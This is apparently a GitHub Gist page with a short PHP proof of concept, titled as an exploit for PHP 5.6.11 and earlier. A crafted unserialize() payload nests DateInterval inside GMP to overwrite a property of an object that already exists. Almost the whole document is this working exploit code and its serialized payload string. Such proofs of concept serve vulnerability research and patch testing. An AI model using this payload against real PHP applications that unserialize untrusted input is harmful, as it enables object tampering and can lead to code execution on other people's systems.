Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
PHP <= 5.6.11 DateInterval + GMP unserialize() object change exploit
<?php
$a = new stdClass; // handle = 1
$a->test = false;
echo('Property $a->test is: ');
var_dump($a->test);
$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}');
echo('Property $a->test changed to: ');
var_dump($a->test);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment